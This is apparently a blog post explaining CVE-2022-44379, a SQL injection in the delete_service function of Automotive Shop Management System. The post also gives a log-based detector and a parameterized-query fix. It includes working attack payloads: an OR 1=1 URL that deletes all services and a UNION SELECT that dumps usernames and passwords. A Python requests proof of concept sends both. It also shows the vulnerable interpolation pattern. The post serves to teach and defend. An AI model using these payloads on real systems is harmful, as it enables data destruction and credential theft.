Automotive Shop Management System (ASMS) v1. is a web-based application used to manage automotive repair shops, handling everything from appointments to inventory. In late 2022, researchers identified a critical vulnerability in ASMS v1., now cataloged as CVE-2022-44379, which allows attackers to perform SQL injection. This post explains the vulnerability, how it can be exploited, and demonstrates it with code examples.
What is SQL Injection?
SQL injection is a common web application vulnerability where an attacker is able to manipulate the SQL statements that an application sends to its database. If user input is not correctly sanitized or parameterized, attackers can modify queries, exposing or even altering data.
Where’s the Vulnerability?
According to the NVD entry and the Packet Storm advisory, the issue is in /asms/classes/Master.php, specifically in the delete_service function:
- File: /asms/classes/Master.php
- Vulnerable parameter: id in the HTTP GET request to ?f=delete_service
The function expects an ID to indicate which service to delete. If user input isn't sanitized, attackers could inject malicious SQL.
Let’s look at what a typical vulnerable snippet might look like inside Master.php:
```php
// Hypothetical vulnerable code!
if($_GET['f'] == 'delete_service'){
    $id = $_GET['id'];                               // raw, unvalidated user input
    $query = "DELETE FROM services WHERE id = $id";  // string interpolation builds the SQL
    $db->query($query);                              // whatever the user sent is parsed as SQL
}
```
Here, $id is taken right from the URL and placed into the query without validation. If an attacker sends a crafted URL, their input will be executed by MySQL.
Assume the application is running at http://asms.example.com/. An attacker can craft a URL such as:
```text
http://asms.example.com/asms/classes/Master.php?f=delete_service&id= OR 1=1
```
The server processes this as:
```sql
DELETE FROM services WHERE id = OR 1=1
```
OR 1=1 always evaluates as true, so all rows in the services table will be deleted.
With error-based or UNION-based techniques, attackers can try to extract data. For example:
```text
http://asms.example.com/asms/classes/Master.php?f=delete_service&id= UNION SELECT 1,username,password FROM users--
```
Depending on how errors are handled or if results are returned, this could dump usernames and passwords.
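Requests like the ones above leave a clear trace in the web server log: a call to Master.php with f=delete_service whose id is anything other than a plain integer. The following Python scanner is an added example (not part of the advisory or of the ASMS code) that flags such requests; only the path and the f / id parameter names come from the advisory, while the log lines, IP addresses and timestamps are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines; not real traffic. Only the path and the
# f=delete_service / id parameter names are taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Nov/2022:10:01:02 +0000] "GET /asms/classes/Master.php?f=delete_service&id=7 HTTP/1.1" 200 15 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Nov/2022:10:01:40 +0000] "GET /asms/classes/Master.php?f=delete_service&id=%20OR%201%3D1 HTTP/1.1" 200 15 "-" "python-requests/2.28.1"
203.0.113.9 - - [18/Nov/2022:10:02:11 +0000] "GET /asms/classes/Master.php?f=delete_service&id=1+UNION+SELECT+1%2Cusername%2Cpassword+FROM+users-- HTTP/1.1" 500 0 "-" "python-requests/2.28.1"
198.51.100.2 - - [18/Nov/2022:10:03:00 +0000] "GET /asms/classes/Master.php?f=get_service&id=3 HTTP/1.1" 200 420 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
NUMERIC_ID = re.compile(r"[0-9]+")


def parse_line(line):
    """Return ip, timestamp, path, decoded query parameters and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": url.path,
        # parse_qs URL-decodes values, so %20 / + become spaces and %3D becomes "="
        "params": parse_qs(url.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def flag_delete_service_abuse(log_text):
    """Flag delete_service calls whose id is anything other than a plain integer."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("/classes/Master.php"):
            continue
        if rec["params"].get("f", [""])[0] != "delete_service":
            continue
        raw_id = rec["params"].get("id", [""])[0]
        if NUMERIC_ID.fullmatch(raw_id):
            continue  # a legitimate numeric id
        hits.append({"ip": rec["ip"], "ts": rec["ts"], "id": raw_id, "status": rec["status"]})
    return hits


if __name__ == "__main__":
    for hit in flag_delete_service_abuse(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} id={hit['id']!r}")
```

The check is deliberately an allow-list (the id must be all digits) rather than a search for keywords such as UNION or OR, so encoded, commented or otherwise obfuscated payloads are caught as well. The HTTP status is kept in the hit because a 500 on this endpoint is a useful secondary signal that the injected SQL was actually parsed.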
Here’s a simple Python PoC using requests:
```python
import requests

# Target URL
url = "http://asms.example.com/asms/classes/Master.php"

# Malicious payload to delete all services
payload = {"f": "delete_service", "id": " OR 1=1"}
response = requests.get(url, params=payload)
print("Status Code:", response.status_code)
print("Response:", response.text)
```
Alternatively, to test for data extraction, you can try (continuing the script above):
```python
payload = {"f": "delete_service", "id": " UNION SELECT 1,username,password FROM users--"}
response = requests.get(url, params=payload)
print(response.text)
```
*(Note: Don’t attack systems without permission – this is for educational purposes only!)*
Fixing the Vulnerability
Sanitize User Input!
Always use parameterized queries or prepared statements. In PHP with MySQLi:
```php
if($_GET['f'] == 'delete_service'){
    $id = intval($_GET['id']); // cast to integer!
    // prepared statement: the value is bound as data, never parsed as SQL
    $stmt = $db->prepare("DELETE FROM services WHERE id = ?");
    $stmt->bind_param("i", $id); // "i" = integer parameter
    $stmt->execute();
}
```
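To make the difference between the two forms concrete, here is an added Python example (not ASMS code, and not from the advisory) that runs the vulnerable interpolation pattern and the fixed, validated-and-parameterized pattern side by side against an in-memory SQLite table with constructed rows. The table and column names mirror the snippets above; SQLite's ? placeholder plays the role of the MySQLi prepared statement.

```python
import re
import sqlite3

# Constructed sample data; the table/column names mirror the ASMS snippets above.
SEED_ROWS = [(1, "Oil change"), (2, "Brake service"), (3, "Tire rotation")]
INTEGER_ID = re.compile(r"[0-9]+")


def seed_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE services (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO services (id, name) VALUES (?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def delete_service_vulnerable(conn, raw_id):
    # Same pattern as the hypothetical Master.php code: input interpolated into the SQL.
    conn.execute(f"DELETE FROM services WHERE id = {raw_id}")
    conn.commit()


def delete_service_fixed(conn, raw_id):
    # Validate the type first, then bind the value so it can never be parsed as SQL.
    if not isinstance(raw_id, str) or not INTEGER_ID.fullmatch(raw_id):
        raise ValueError("id must be a non-negative integer")
    cur = conn.execute("DELETE FROM services WHERE id = ?", (int(raw_id),))
    conn.commit()
    return cur.rowcount  # number of rows actually deleted


def count_services(conn):
    return conn.execute("SELECT COUNT(*) FROM services").fetchone()[0]


def demo():
    results = {}

    # Vulnerable version: a normal id deletes one row, an injected id deletes everything.
    conn = seed_db()
    delete_service_vulnerable(conn, "2")
    results["vuln_normal"] = count_services(conn)
    delete_service_vulnerable(conn, "1 OR 1=1")
    results["vuln_injected"] = count_services(conn)

    # The bare " OR 1=1" from the write-up leaves "id =" without a right operand,
    # which SQLite (like MySQL) rejects as a syntax error instead of executing.
    conn = seed_db()
    try:
        delete_service_vulnerable(conn, " OR 1=1")
        results["vuln_bare_or"] = "executed"
    except sqlite3.OperationalError:
        results["vuln_bare_or"] = "syntax error"

    # Fixed version: the normal id still works, the injected id is rejected outright.
    conn = seed_db()
    results["fixed_normal"] = delete_service_fixed(conn, "2")
    try:
        delete_service_fixed(conn, "1 OR 1=1")
        results["fixed_injected"] = "executed"
    except ValueError:
        results["fixed_injected"] = "rejected"
    results["fixed_remaining"] = count_services(conn)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

One design choice worth noting: the fixed function rejects non-numeric input instead of coercing it. PHP's intval() silently turns "1 OR 1=1" into 1, which keeps the query safe but deletes a row the caller may not have intended and hides the attempt; raising an error lets the application log and alert on it.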
References
- NVD - CVE-2022-44379
- Exploit Disclosure on Packet Storm
- What is SQL Injection? (OWASP)
Conclusion
CVE-2022-44379 shows how dangerous simple mistakes in code can be. SQL injection can lead to complete compromise of application data. Always validate input, use parameterized queries, and regularly update your software. If you use Automotive Shop Management System v1., patch or fix your code as soon as possible!
Timeline
Published on: 11/18/2022 18:15:00 UTC
Last modified on: 11/21/2022 01:40:00 UTC